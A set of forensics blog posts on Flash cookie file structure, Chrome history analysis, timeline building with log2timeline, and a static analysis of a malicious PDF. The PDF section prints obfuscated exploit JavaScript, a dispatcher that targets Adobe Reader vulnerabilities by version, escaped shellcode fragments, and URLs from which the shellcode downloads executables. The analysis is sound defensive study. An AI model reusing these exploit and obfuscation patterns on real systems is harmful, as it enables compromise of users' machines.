Local Shared Objects, aka Flash Cookies

The Adobe Flash Player can store various information about user settings to “remember” things like a user’s preferred volume in a video player, saved game settings, whether or not the user allows the Flash Player to connect to the web camera, etc. With the introduction of ad-blocking software and privacy settings in browsers, web developers and advertisers have increasingly started to use these files to store other information as well (see the paper “Flash Cookies and Privacy“). These files are now often used to store the same information as can be found inside traditional browser cookies. The notion of Flash cookies has been discussed previously on SANS blogs, both in the Digital Forensics Blog by Chad Tilbury and in the IT Audit one by David Hoelzer.

Despite the privacy modes of many browsers today, which do not store any browser history on the local disk, local shared objects (Flash cookies) are still collected and stored, and can be examined to determine browsing history. This has proven very valuable to investigators so far; however, that might change in the next release of the player, version 10.1, where private browsing will be implemented according to Adobe.

According to Adobe: “Instead of saving local storage (local shared objects, or LSOs) on disk as it does during normal browsing, Flash Player stores LSOs in memory during private browsing”. After this change Flash cookies will not be as effective in tracing a user’s web behavior as they used to be when users browse in privacy mode. They remain very useful in tracking user behavior when private browsing is turned off, since Flash cookies are not cleared when users clear their browser cookies.

A few points about Flash cookies:

  • The cookies can be viewed and managed with several tools, some of which are discussed in this blog post.
  • Cookie information in a local shared object is not affected when the user clears his or her browser cookies, and it can be shared independently of the browser in use.

Structure

The LSO is stored as a binary file in network (big-endian) byte order. The file is structured in three sections:

  • The first 16 bytes are the file’s header.
  • The object’s name in ASCII.
  • A series of data objects that contain the actual values of the LSO.

Header

As noted above the first 16 bytes comprise the LSO header.  It is structured in the following way:

  • Two bytes of magic value (should be 0x00bf).
  • Four bytes for the length of the LSO file, excluding the magic value and the length field itself. To get the correct total length this value should therefore be increased by six.
  • Four bytes of magic value. This should be the ASCII string TCSO.
  • Six bytes of padding, which should always equal 0x00 04 00 00 00 00.

An example header is:

<00bf> {0000 004b} [5443 534f] <0004 0000 0000>

If the header above is examined a bit more closely it can be seen that the length of the LSO file is 0x00 00 00 4b = 75.  If we add the length of the magic bytes at the beginning and the length of the int32 value that represents the length variable, we get a total LSO file length of 75 + 6 = 81 bytes (0x51).
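
The header layout described above can be expressed in a few lines of Python (a quick sketch for illustration; this is not taken from any of the tools mentioned here):

```python
import struct

def parse_lso_header(data):
    """Parse the 16-byte header of a Local Shared Object (.sol) file."""
    magic, length = struct.unpack('>HI', data[0:6])   # big-endian, per the layout above
    assert magic == 0x00bf, 'bad magic value'
    tcso = data[6:10].decode('ascii')                 # should be "TCSO"
    # data[10:16] is the six bytes of padding (00 04 00 00 00 00)
    return {'length': length, 'total_length': length + 6, 'tcso': tcso}

# The example header from the text:
header = bytes.fromhex('00bf0000004b5443534f000400000000')
print(parse_lso_header(header))   # {'length': 75, 'total_length': 81, 'tcso': 'TCSO'}
```

Running it against the example header confirms the arithmetic above: a stored length of 75 and a total file length of 81 bytes.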

Object Name

Following the header is the object’s name.  The structure is simple:

  • The first two bytes represent the length of the name part.
  • The name itself in ASCII, as many bytes as the previous value indicates.
  • Four bytes of padding (should equal 0x00 00 00 00).

An example name part is the following:

(0014) <796f 7574 7562 652e 636f 6d2f 7365 7474 696e 6773> {0000 0000}

The length of the name is stored inside the parentheses: 0x14, or 20 bytes.  The next 20 bytes then represent the name part, in this case youtube.com/settings.
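
The name section can be read with a similar few lines of Python (again just a sketch of the layout described above):

```python
import struct

def parse_lso_name(data, offset=16):
    """Read the object name that follows the 16-byte LSO header."""
    (name_len,) = struct.unpack_from('>H', data, offset)      # two-byte length
    name = data[offset + 2:offset + 2 + name_len].decode('ascii')
    # four bytes of zero padding follow the name
    return name, offset + 2 + name_len + 4

# The example name part from the text:
name_part = bytes.fromhex('0014'
                          '796f75747562652e636f6d2f73657474696e6773'
                          '00000000')
name, next_offset = parse_lso_name(name_part, offset=0)
print(name)   # youtube.com/settings
```

The returned offset points just past the padding, i.e. at the first data element.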

Data

After the name part ends, a series of data elements starts.  Each data element is structured in the following way:

  • Two bytes representing the length of the name in ASCII
  • The name of the data/variable
  • One byte indicating the type of the data/variable

There are several different data types available, each one represented differently. The available data types are:

  • 0x00 – NUMBER.  This is a double number so the next eight bytes represent the number.
  • 0x01 – BOOLEAN. One byte is read, either it is TRUE (value of 0x01) or FALSE (value of 0x00).
  • 0x02 – STRING. Contains two bytes representing the length of the string, followed by that amount of bytes in ASCII.
  • 0x03 – OBJECT. An object contains various data types wrapped inside a single data type.  It has the same structure as other data types: it begins with two bytes representing the length of the name part of the variable, followed by the name in ASCII and then one byte representing the data type, which is then read the same way as any other data type.  The object then ends with the magic number “0x00 00 09”.
  • 0x05 – NULL.  This is just a null object.
  • 0x06 – UNDEFINED.  This is also a null object, since it has not been defined.
  • 0x08 – ARRAY. The array has exactly the same structure as an object, except that it starts with four bytes representing the number of elements stored inside the array.  As with objects, it ends with the magic number “0x00 00 09”.
  • 0x0B – DATE. A date object is ten bytes: a double number contained in the first eight bytes, followed by a signed short integer (two bytes) that represents the time zone offset in minutes.  The double number represents an Epoch time in milliseconds.
  • 0x0D – NULL. As the name implies a null value.
  • 0x0F – XML. An XML structure begins with two bytes that should equal zero (0x00) followed by a string value (first two bytes represent the length of the XML, then an ASCII text containing the XML text).
  • 0x10 – CLASS. The class is very similar to that of an array or an object.  The only difference is a class starts with a name of the class.  The first two bytes represent the length of the name, followed by the name of the class in ASCII.  Then as usual additional data types that are contained within the class, ending with a magic value of “0x00 00 09”.
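
As a sketch of how the simpler types are read in practice, the following Python fragment decodes a NUMBER, BOOLEAN or STRING element as described above (the sample data is constructed by hand purely for illustration):

```python
import struct

def parse_lso_value(data, offset):
    """Decode a single LSO data element (NUMBER, BOOLEAN or STRING only)."""
    (name_len,) = struct.unpack_from('>H', data, offset)   # two-byte name length
    offset += 2
    name = data[offset:offset + name_len].decode('ascii')
    offset += name_len
    dtype = data[offset]                                   # one-byte type marker
    offset += 1
    if dtype == 0x00:                      # NUMBER: eight-byte big-endian double
        (value,) = struct.unpack_from('>d', data, offset)
        offset += 8
    elif dtype == 0x01:                    # BOOLEAN: one byte, 0x00 or 0x01
        value = data[offset] != 0
        offset += 1
    elif dtype == 0x02:                    # STRING: two-byte length + ASCII text
        (slen,) = struct.unpack_from('>H', data, offset)
        value = data[offset + 2:offset + 2 + slen].decode('ascii')
        offset += 2 + slen
    else:
        raise NotImplementedError('type 0x%02x' % dtype)
    return name, value, offset

# Hand-built sample: "volume" = 40.0 (NUMBER) followed by "mute" = FALSE (BOOLEAN)
blob = (struct.pack('>H', 6) + b'volume' + b'\x00' + struct.pack('>d', 40.0)
        + struct.pack('>H', 4) + b'mute' + b'\x01' + b'\x00')
name, value, off = parse_lso_value(blob, 0)
print(name, value)   # volume 40.0
```

A full parser would add the OBJECT, ARRAY, DATE, XML and CLASS types in the same loop, recursing where the type contains nested elements.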

The tool log2timeline contains an input module that parses the structure of a .sol file and extracts all available timestamps to represent them in a super timeline.  An example usage of the tool is:

log2timeline -f sol -z local youtube.com/soundData.sol
0|[LSO] LSO created -> File: youtube.com/soundData.sol and object name: soundData variable: {mute = (FALSE), volume = (40)} |20835066|0|0|0|0|1262603852|1262603852|1262603852|1262603852
log2timeline -f sol -z local www.site.com/aa_user.sol
0|[LSO] lastVisit -> File: www.site.com/aa_user.sol and object name: aa_user variable: {usr_rName = (XXXXX), mainList = (Bruno_DVD_UK => banner2 => count => 1, hasClicked => no, lastVisit => Mon Nov 23 2009 15:43:37 GMT, count => 1, hasClicked => no), usr_rgdt = (Mon Nov 23 2009 15:43:37 GMT), usr_kbsr =  (0)} |20835107|0|0|0|0|1258991017|1258991017|1258991017|1258991017

Kristinn Guðjónsson, GCFA #5028, is the author of log2timeline and several other scripts as well as being the team leader of information security at Skyggnir, forensic analyst, incident handler and a local mentor for SANS.

Google Chrome Forensics

Google Chrome stores the browser history in a SQLite database, not unlike Firefox.  Yet the structure of the database file is quite different.

Chrome stores its files in the following locations:

  • Linux: /home/$USER/.config/google-chrome/
  • Linux: /home/$USER/.config/chromium/
  • Windows Vista (and Win 7): C:\Users\[USERNAME]\AppData\Local\Google\Chrome\
  • Windows XP: C:\Documents and Settings\[USERNAME]\Local Settings\Application Data\Google\Chrome\

There are two different versions of Google Chrome for Linux: the official packages distributed by Google, which store their data in the google-chrome directory, and Chromium, the version shipped by Linux distributions, which uses the chromium directory.

The database file that contains the browsing history is stored under the Default folder as “History” and can be examined using any SQLite browser (such as sqlite3).  The available tables are:

  • downloads
  • presentation
  • urls
  • keyword_search_terms
  • segment_usage
  • visits
  • meta
  • segments

The most relevant tables for browsing history are the “urls” table, which contains all the visited URLs; the “visits” table, which contains, among other things, information about the type of visit and the timestamps; and finally the “downloads” table, which contains a list of downloaded files.

If we examine the urls table, for instance by using sqlite3, we can see:

sqlite> .schema urls
CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,
typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,
favicon_id INTEGER DEFAULT 0 NOT NULL);
CREATE INDEX urls_favicon_id_INDEX ON urls (favicon_id);
CREATE INDEX urls_url_index ON urls (url);

And the visits table

sqlite> .schema visits
CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,is_indexed BOOLEAN);
CREATE INDEX visits_from_index ON visits (from_visit);
CREATE INDEX visits_time_index ON visits (visit_time);
CREATE INDEX visits_url_index ON visits (url);

So we can construct a SQL statement to get some information about the user’s browsing habits:

SELECT urls.url, urls.title, urls.visit_count, urls.typed_count, urls.last_visit_time, urls.hidden, visits.visit_time, visits.from_visit, visits.transition
FROM urls, visits
WHERE
 urls.id = visits.url

This SQL statement extracts all the URLs the user visited alongside the visit count, type and timestamps.
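
A self-contained way to experiment with this query is Python’s built-in sqlite3 module.  The snippet below recreates a trimmed version of the schema in memory and runs the join; against a real History file you would open the file directly and run only the SELECT (the inserted row is made up for the demo):

```python
import sqlite3

# In-memory stand-in for a copy of the Chrome History file; the schema is
# trimmed to the columns the query uses.
conn = sqlite3.connect(':memory:')
cur = conn.cursor()
cur.execute("CREATE TABLE urls(id INTEGER PRIMARY KEY, url LONGVARCHAR, "
            "title LONGVARCHAR, visit_count INTEGER, typed_count INTEGER, "
            "last_visit_time INTEGER, hidden INTEGER, favicon_id INTEGER)")
cur.execute("CREATE TABLE visits(id INTEGER PRIMARY KEY, url INTEGER, "
            "visit_time INTEGER, from_visit INTEGER, transition INTEGER, "
            "segment_id INTEGER, is_indexed BOOLEAN)")
cur.execute("INSERT INTO urls VALUES (1, 'http://isc.sans.org/', "
            "'SANS Internet Storm Center', 1, 1, 12905518429000000, 0, 0)")
cur.execute("INSERT INTO visits VALUES (1, 1, 12905518429000000, 0, 1, 0, 0)")

rows = cur.execute(
    "SELECT urls.url, urls.title, urls.visit_count, urls.typed_count, "
    "urls.last_visit_time, urls.hidden, visits.visit_time, visits.from_visit, "
    "visits.transition FROM urls, visits WHERE urls.id = visits.url").fetchall()
print(rows[0][0], rows[0][8])   # http://isc.sans.org/ 1
```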

If we examine the timestamp information from the visits table we can see that it is not in Epoch format.  The timestamp in the visits table is the number of microseconds since midnight UTC, 1 January 1601, as others have noticed as well, such as firefoxforensics.
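
Converting this format to a Unix epoch is a simple subtraction; a sketch (the example value is constructed for illustration):

```python
# Chrome's visit_time is microseconds since 1601-01-01 00:00:00 UTC (the
# Windows FILETIME epoch); 11644473600 seconds separate it from the Unix epoch.
CHROME_EPOCH_OFFSET = 11644473600

def chrome_time_to_unix(chrome_us):
    """Convert a Chrome visit_time value to Unix epoch seconds."""
    return chrome_us / 1_000_000 - CHROME_EPOCH_OFFSET

print(chrome_time_to_unix(12905518429000000))   # 1261044829.0
```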

If we take a look at the schema of the downloads table (.schema downloads) we see

CREATE TABLE downloads (id INTEGER PRIMARY KEY,full_path LONGVARCHAR NOT NULL,url LONGVARCHAR NOT NULL,
start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL);

Examining the timestamp there (start_time), we can see that it is stored in Epoch format.

There is one more interesting thing to mention in the “visits” table: the “transition” column.  This value describes how the URL was loaded in the browser.  For full documentation see the source code of page_transition_types; in short, the core parameters are the following:

  • LINK. The user got to the page by clicking a link.
  • TYPED. The user typed the URL in the URL bar.
  • AUTO_BOOKMARK. The user got to this page through a suggestion in the UI, for example through the destinations page.
  • AUTO_SUBFRAME. Any content that is automatically loaded in a non-top-level frame. The user might not realize this is a separate frame, so he might not know he browsed there.
  • MANUAL_SUBFRAME. Subframe navigations that are explicitly requested by the user and generate new navigation entries in the back/forward list.
  • GENERATED. The user got to this page by typing in the URL bar and selecting an entry that did not look like a URL.
  • START_PAGE. The user’s start page or home page, or a URL passed on the command line (Chrome was started with this URL).
  • FORM_SUBMIT. The user filled out values in a form and submitted it.
  • RELOAD. The user reloaded the page, whether by hitting reload, pressing enter in the URL bar or restoring a session.
  • KEYWORD. The URL was generated from a replaceable keyword other than the default search provider.
  • KEYWORD_GENERATED. Corresponds to a visit generated for a keyword.

The transition variable contains more information than just the core parameters.  It also stores so-called qualifiers, such as whether this was a client or server redirect and whether this is the beginning or end of a navigation chain.

When reading the transition value from the database, it has to be ANDed with the variable CORE_MASK to extract just the core parameter:

CORE_MASK = 0xFF,
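
In code, extracting the core parameter might look like this (the numeric values shown are a subset taken from page_transition_types; treat them as illustrative):

```python
CORE_MASK = 0xFF

# A subset of the core transition values, as listed in page_transition_types
TRANSITIONS = {
    0: 'LINK',
    1: 'TYPED',
    6: 'START_PAGE',
    8: 'RELOAD',
}

def core_transition(value):
    """Mask off the qualifier bits and look up the core transition type."""
    return TRANSITIONS.get(value & CORE_MASK, 'UNKNOWN')

# Qualifier bits in the high bytes do not change the core type:
print(core_transition(0x30000001))   # TYPED
```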

I’ve created an input module to log2timeline to make things a little bit easier by automating this.  At this time the input module is only available in the nightly builds, but it will be released in version 0.41 of the framework.

An example usage of the script is the following:

log2timeline -f chrome -z local History
...
0|[Chrome] User: kristinng URL visited: http://tools.google.com/chrome/intl/en/welcome.html (Get started with Google Chrome) [count: 1] Host: tools.google.com type: [START_PAGE - The start page of the browser] (URL not typed directly)|0|0|0|0|0|1261044829|1261044829|1261044829|1261044829
...
0|[Chrome] User: kristinng URL visited: http://isc.sans.org/ (SANS Internet Storm Center; Cooperative Network Security Community - Internet Security) [count: 1] Host: isc.sans.org type: [TYPED - User typed the URL in the URL bar] (directly typed)|0|0|0|0|0|1261044989|1261044989|1261044989|1261044989..

The script reads the user name from the directory path where the history file was found, then reads the database structure from the History file and prints the information in a human-readable form (this output is in mactime format).  To convert this information to CSV using mactime:

log2timeline -f chrome -z local History > bodyfile
mactime -b bodyfile -d > body.csv

And the same lines in the CSV file are then:

Thu Dec 17 2009 10:13:49,0,macb,0,0,0,0,[Chrome] User: kristinng URL visited: http://tools.google.com/chrome/intl/en/welcome.html (Get started with Google Chrome) [count: 1] Host: tools.google.com type: [START_PAGE - The start page of the browser] (URL not typed directly)
Thu Dec 17 2009 10:16:29,0,macb,0,0,0,0,[Chrome] User: kristinng URL visited: http://isc.sans.org/ (SANS Internet Storm Center; Cooperative Network Security Community - Internet Security) [count: 1] Host: isc.sans.org type: [TYPED - User typed the URL in the URL bar] (directly typed)


PDF malware analysis

I decided to do some malware analysis as part of a presentation I had to do, and since I went through the process, I decided to post it here in case anyone is interested.

To begin with, I needed to find some malware to analyze, and a great place to find live links to active malware is the site Malware Domain List.

What I wanted to show was that having a fully patched machine with a fully updated AV is not always enough to protect you. One way to show that is to find a PDF or Flash exploit. The one I chose for this experiment was this one:

PDF exploit to be used

First things first: download the malware sample and do some static analysis on it. First I ran pdfid.py from Didier Stevens to get some basic information about the PDF document:

pdfid.py dhkn.pdf
PDFiD 0.0.9 dhkn.pdf
 PDF Header: %PDF-1.4
 obj                    9
 endobj                 9
 stream                 2
 endstream              2
 xref                   0
 trailer                1
 startxref              1
 /Page                  0
 /Encrypt               0
 /ObjStm                0
 /JS                    1
 /JavaScript            2
 /AA                    0
 /OpenAction            0
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Colors > 2^24         0

Looking at this we can see that there is JavaScript code in the document, which is commonly used to exploit Adobe Reader, and we also see that there are streams in the document. Now we need to take a closer look at the source of the document. This can be done with any text editor, such as vim, or just using less (or cat).

If we examine the document we don’t see any text, just a stream that is JavaScript:

...
endstream
endobj
6 0 obj
<</CS /DeviceRGB /S /Transparency >>
endobj
7 0 obj
<</Length 76450 /Filter [/ASCIIHexDecode]>>
stream
7661722066686e7075783d27273b6567686a76783d22223b616567777a3d35303431323b6465757....
...

This stream can be easily decoded. We see that the filter used is a simple ASCIIHexDecode, so I simply copy the stream:

grep ^stream dhkn.pdf -A 2  > stream

I then edited the file and deleted the lines that did not belong to the stream itself. Since the file now contained only the hex code of the stream, I could decode it with a simple Perl script:

#!/usr/bin/perl

use strict;

my $line = undef;
my $string = undef;

my $file = shift;

die( 'Wrong usage: ' . $0 . ' FILE' ) unless -e $file;

open( FH, $file ) or die( 'Unable to read file ' . $file );
open( RW, '>' . $file . '.txt' );

while( $line = <FH> )
{
 print "Processing line\n";
 chomp( $line );              # strip the newline before decoding
 $line =~ s/[^0-9a-fA-F]//g;  # keep hex digits only (drops '%', '>' etc.)

 $string = pack 'H*', $line;  # turn the hex digits into raw bytes
 print RW $string;
}

close( FH );
close( RW );

I run the script like this:

./conv.pl stream

The content of the text file stream.txt looks something like this

var fhnpux='';eghjvx="";aegwz=50412;deuv="";var fiqy='',lmuz=false,ekrt=true,gpqr=false,
hnrty='',hloqr=0,dimtz=String,afioxy=dimtz['fkrEoAmkCBhkaBrRCAoAdkeE'.replace(/[EABkR]/g,'')],
gilmq=String,abdmv=gilmq['eBvBaLlI'.replace(/[ILABJ]/g,'')],ikmqw="61",begily="",aefmos=[67,59,
63,151,171,159,153,165,159,160,164,81,156,154,174,144,159,165,94,170,151,163,169,161,98,81,162,...
...

Obviously an obfuscated JavaScript, so we need to dig a little deeper. To make it easier to read, a simple substitution is done:

cat stream.txt | sed -e 's/;/;\n/g' > stream.js

This makes the code a little bit easier to read. Then, to make it even easier, vim is used to edit the file and add spaces and new lines where needed. There are two things in this code that are interesting (well, the two most interesting things that pop up at least). First of all, the function close to the end of the file:

lquv=function()
{
      for(var fjpu;hloqr<aefmos.length;hloqr+=1)
      {
                var fjqu=hloqr%ikmqw.length+1;
                var dorvy=ikmqw.substring(hloqr%ikmqw.length,fjqu);
                var blrwy=aefmos[hloqr];
                begily+=afioxy(blrwy-dorvy.charCodeAt(0));
        }
        abdmv(begily);
};
lquv();

We see that we have a function called “lquv” which seems to take care of decoding the obfuscated code. At the end, a function called “abdmv” is called with the parameter begily, which is the variable that holds the decoded JavaScript. The function “abdmv” is defined earlier in the code:

gilmq=String
abdmv=gilmq['eBvBaLlI'.replace(/[ILABJ]/g,'')]

This is a very simple obfuscation. We see that “gilmq” is defined as a String and “abdmv” then becomes (when we complete the simple substitution):

gilmq['eval']

So when the function calls “abdmv(begily)” we are about to evaluate or execute the code contained in the variable begily. We therefore need to know what is inside “begily”. The basis for “begily” resides in the variable “aefmos” (the second interesting thing we found), which is defined as:

aefmos=[67,59,6....
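
The decoding loop in “lquv” can also be reproduced outside the browser; a minimal Python sketch of the same arithmetic (the key and codes below are made up for illustration, not taken from this sample):

```python
def decode(codes, key):
    """Same arithmetic as the "lquv" loop: each stored code is the character
    code of the plaintext plus a rolling key character, so subtract it back."""
    out = []
    for i, code in enumerate(codes):
        out.append(chr(code - ord(key[i % len(key)])))
    return ''.join(out)

# Made-up sample: these four codes decode to "var " with the key "61"
print(decode([172, 146, 168, 81], '61'))   # prints "var "
```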

The easiest way (or at least an easy method) to decode this string is simply to turn stream.js into an HTML document and open it in a browser or another JavaScript interpreter.

We add to the top of the document

<html>
<head><title>TESTING</title></head>
<body>
<script>

And at the bottom

</script>
</body>
</html>

We then modify the JavaScript itself. First of all the document ends with a ?, which we delete. Then we modify the function “lquv” so that it prints the JavaScript instead of evaluating it.

lquv=function()
{
 for(var fjpu; hloqr<aefmos.length;hloqr+=1)
 {
 var fjqu=hloqr%ikmqw.length+1;
 var dorvy=ikmqw.substring(hloqr%ikmqw.length,fjqu);
 var blrwy=aefmos[hloqr];
 begily+=afioxy(blrwy-dorvy.charCodeAt(0));
 }
 //abdmv(begily);
 document.write(begily);
};

The change is the commented-out call to “abdmv” and the added document.write line. I then open this document in a sandboxed environment to get the variable begily decoded. The decoded script looks like this:

function fix_it(yarsp, len)
{
 while (yarsp.length * 2 < len)
 {
 yarsp += yarsp;
 }

 yarsp = yarsp.substring(0, len/2);
...

Now we have the true JavaScript code that is to be run on the machine. It contains several functions, some of which contain the magic variable names “shellcode” or “payload”, usually considered an indication of malware (if the obfuscation isn’t enough). Near the end of the code we see this:

function pdf_start()
{
 var version = app.viewerVersion.toString();
 version = version.replace(/\D/g,'');
 var varsion_array = new Array(version.charAt(0), version.charAt(1), \
version.charAt(2));

 if ((varsion_array[0] == 8 ) && (varsion_array[1] == 0) || \
(varsion_array[1] == 1 && varsion_array[2] < 3))
 {
 util_printf();
 }

 if ((varsion_array[0] < 8 ) || (varsion_array[0] == 8 && \
varsion_array[1] < 2 && varsion_array[2] < 2))
 {
 collab_email();
 }

 if ((varsion_array[0] < 9 ) || (varsion_array[0] == 9 && \
varsion_array[1] < 1))
 {
 collab_geticon();
 }
}

pdf_start();

This function is called at the end, and we can see that it begins by getting the Adobe Reader version before going through a series of if statements, trying to determine which exploit to use based on the version number. This particular exploit is used against Adobe Reader versions:

  • 8.0, or 8.1.0-8.1.2 (util_printf)
  • Versions older than 8.0, or 8.0/8.1 with a patch level below 2 (collab_email)
  • Versions older than 9.1 (collab_geticon)

A different exploit is run based on which of the criteria listed above is met. If we examine the payloads or shellcodes, we see that they are encoded using the JavaScript function “escape” and are all similar to the one listed below:

var payload = unescape("%uEBE9%u0001%u5600%uA164%u0030%u0....

To further analyse this malware the payload has to be examined. So we copy the payload to a file and create a simple Perl script to change the JavaScript to binary:

#!/usr/bin/perl
use strict;
use Encode;

my $file = shift;
my $line = undef;
my $string = undef;
my @chars = undef;
my $done;

die('file does not exist') unless -e $file;

open( FH, $file ) or die( 'Unable to open file: ' . $file );
open( RW, '>' . $file . '.dat' );
binmode RW;

# read all lines
while( <FH> )
{
 @chars = split( /%u/ );   # each element after the first is one 4-digit hex group
 print "Processing line..\n";
 print "LINE CONSISTS OF " . $#chars . " CHARS\n";

 $done = -1;
 foreach my $char (@chars )
 {
  $done++;
  next unless $done;   # skip the text before the first %u

  # each %uXXXX group is an unsigned 16-bit value, written out little-endian
  print RW pack( 'v', hex( $char ) );
 }
}

close(RW);
close( FH );

So to run the script

./decode_shell shell

Now I’ve got a binary file, called shell.dat, which can be easily analysed using strings:

strings -a -t x shell.dat
36 QQSVW`
65 B`;U
1a8 PhhC
1d5 PSSSSSS
1f3 QQSVWjB
209 a.ex
229 YYt9
243 YYt
 W
264 YYFF;
274 QSf`
2a1 t
 @8
2ba http://style-boards.com/forum/bmosz2.exe
2e3 http://style-boards.com/forum/click.php?r=

We see that this particular shellcode (the one used to exploit version 9.0) simply downloads more malware to the machine. There are two files fetched, both of which had been removed from the server in question at the time of analysis, so further analysis wasn’t possible.

To test the other payloads, we examine the one that exploits the util_printf vulnerability.

./decode_shell util_shell
Processing line..
LINE CONSISTS OF 391 CHARS
strings -a -t x util_shell.dat
...
209 a.ex
...
2ba http://style-boards.com/forum/cdruz2.exe
2e3 http://style-boards.com/forum/click.php?r=

And the collab_email exploit:

./decode_shell collab_email_shell
Processing line..
LINE CONSISTS OF 392 CHARS
strings -a -t x collab_email_shell.dat
...
209 a.ex
...
2ba http://style-boards.com/forum/fkntuw2.exe
2e4 http://style-boards.com/forum/click.php?r=

We can see that for each of the exploits there are two executable files downloaded, and the file that comes with “click.php?r=” seems to be the same one for each of them. The second executable has a different name each time: fkntuw2.exe, cdruz2.exe and bmosz2.exe.

I was unable to analyze the executables further since they had all been removed from the server by the time I tried to download them; I got a 404 error from the server. The PDF document itself still remained on the server the last time I checked.

This concludes the static analysis of the code. I also did a live dynamic analysis of the malware that I might share at a later time, but for now the static analysis will have to do.

Artifact Timeline Creation and Analysis – part 2

In the last post I talked about the tool log2timeline, and mentioned a hypothetical case that we are working on.  Let’s explore in further detail how we can use the tool to assist us in our analysis.

How do we go about collecting all the data that we need for the case? In this case we know that we were called to investigate only hours after the alleged policy violation, so a timeline can be a very valuable source of evidence.  We therefore decide to construct a timeline using artifacts found on the system, so that we can examine the evidence with respect to time.  By doing that we both get a better picture of the events that occurred and possibly find other artifacts that we need to examine more closely using other tools and techniques.

To begin with, you image the drive.  You take an image of the C drive (first partition) and start working on the image on your analysis workstation.  For the first step, creating a traditional filesystem timeline, you can refer to a previous blog post:

http://sansforensics.wordpress.com/2009/02/24/digital-forensic-sifting-registry-and-filesystem-timeline-creation/

Or for a quick reference, you can execute the following commands to get the filesystem timeline (assuming that the image name is suspect_drive.dd):

fls -m C: -r suspect_drive.dd > /tmp/bodyfile

After creating the traditional filesystem timeline we need to incorporate artifacts into it. To do that we need to mount the suspect drive, for instance by issuing this command:

mkdir /mnt/analyze
mount.ntfs-3g -o ro,nodev,noexec,show_sys_files,loop /analyze/suspect_drive.dd /mnt/analyze

Now the suspect drive is mounted as a read-only so we can inspect some of the artifacts found on the system.

cd /mnt/analyze/WINDOWS/Prefetch
log2timeline -f prefetch . >> /tmp/bodyfile

We start by navigating to the Prefetch directory, which stores information about recently started programs (created to speed up the loading of those programs), and run the tool against it. The output is stored in the same bodyfile as the traditional file system timeline. Then we navigate to the profile of the user we are taking a closer look at, to examine the UserAssist part of the user’s registry (which stores information about processes recently run by that user).

cd /mnt/analyze/Documents and Settings/joe
log2timeline -f userassist NTUSER.DAT >> /tmp/bodyfile

Now we have incorporated information found inside a particular user in the bodyfile. Next we examine the recycle bin

cd /mnt/analyze/RECYCLER
log2timeline -f recycler INFO2 >> /tmp/bodyfile

We also want to examine the restore information, that is, the information found inside the restore points (the creation times of the restore points):

cd /mnt/analyze/System Volume Information/_restore{A4195436-6BCB-468A-8B2F-BEE5EB150433}/
log2timeline -f restore . >> /tmp/bodyfile

Since we suspect that the user Joe opened a few documents, we also want to examine the user’s recent documents folder, so we incorporate the information found inside Windows shortcut files into our case:

cd /mnt/analyze/Documents and Settings/joe/Recent
ls -b *.lnk | while read d; do log2timeline -f win_link "$d" >> /tmp/bodyfile; done

We also find out, by examining the “Program Files” folder (or the registry), that the Firefox browser is installed on the workstation (which is not allowed according to corporate policy).  So we add the Firefox history to our timeline as well.

cd /mnt/analyze/Documents and Settings/joe/Application Data/Mozilla/Firefox/Profiles/dgml8g3t.default/
log2timeline -f firefox3 places.sqlite >> /tmp/bodyfile

Now we are ready to examine the timeline a little more closely.  To turn the bodyfile into a useful timeline we use the tool mactime from TSK (The Sleuth Kit):

mactime -b /tmp/bodyfile 2009-08-01..2009-08-05 > /tmp/timeline

And now we can start examining the timeline itself. If we look at August 04 (which is the date that the HR department gave us as a possible date) we see from the information gathered in UserAssist that the user Joe ran the browser Internet Explorer at 15:13:42, which is confirmed by the update of the access time of the IEXPLORE.EXE file one second later.

joe running Internet Explorer

At 15:13:53 a Prefetch file is created for Internet Explorer and as indicated inside the Prefetch file Internet Explorer was last run at 15:13:43 (and has been run 11 times on this machine). This can be seen on the timeline below:

Internet Explorer being run

The tool log2timeline does not support index.dat files (at the time of this writing, although it will very soon), so for that part we have to rely on traditional file system analysis.  We can see that the cookie joe@mozilla[1].txt was created at 15:14:48, suggesting that the user Joe visited the site Mozilla.org.

joe visiting Mozilla site

We then see that the user joe created the file “joe@download.mozilla[1].txt” at 15:14:49, indicating that the user may have downloaded the Firefox browser.

joe downloading Firefox

This can then be confirmed by looking at the timeline from 15:16:10, where we see Firefox being set up on the machine.  We can then say that the user Joe most likely installed Firefox on the machine.

Firefox being installed

Our suspicion that the user Joe installed Firefox is then further strengthened when we see that a Firefox user profile was created at 15:16:11 inside Joe’s user directory.

Firefox profile created for user Joe

And if we take a look at the Prefetch folder we see that Firefox was indeed set up on this machine, since we see that “FIREFOX SETUP 3.5.2[2].EXE” was run.  Firefox setup was run at 15:16:08 according to information found inside the Prefetch file.

Firefox setup being run

We can then see that the Firefox browser was being run at 15:16:56 (last time it was run) and that it has been run three times.  This can be seen from the Prefetch part of the timeline.

Firefox being run

Next in the timeline we can see the Firefox 3 history, gleaned from the places.sqlite file.  We see that when the user Joe opened Firefox, the default start page was loaded (the default page is Google, and since the language of the suspect machine is Icelandic, the Icelandic version of Google, google.is, is used).

Firefox start page

We then see that the user Joe ran a Google search at 15:17:43.  The search terms were: “how to delete files”. Hmm, this might be interesting. We then see that the user navigated to the site “www.cybertechhelp.com/tutorial/article/how-to-delete-files-and-folders”.  This site has the title “How to delete files and folders” and the user navigated to it from www.google.is.  This can all be seen in the timeline, as shown below:

Google search in Firefox

We then see that the user Joe continues to read up on “how-to delete files” sites:

Reading web site in Firefox

And some more sites (how to delete files for good):

Reading up on how to delete files

At 15:18:27 the user Joe starts reading up on wiping software.

Reading about wiping software

And some more from the same site:

Reading about wiping software

The user then goes to a page that seems to be related to downloading the tool (the URL includes /download and the title of the page indicates a download site).

Downloading wiping tool

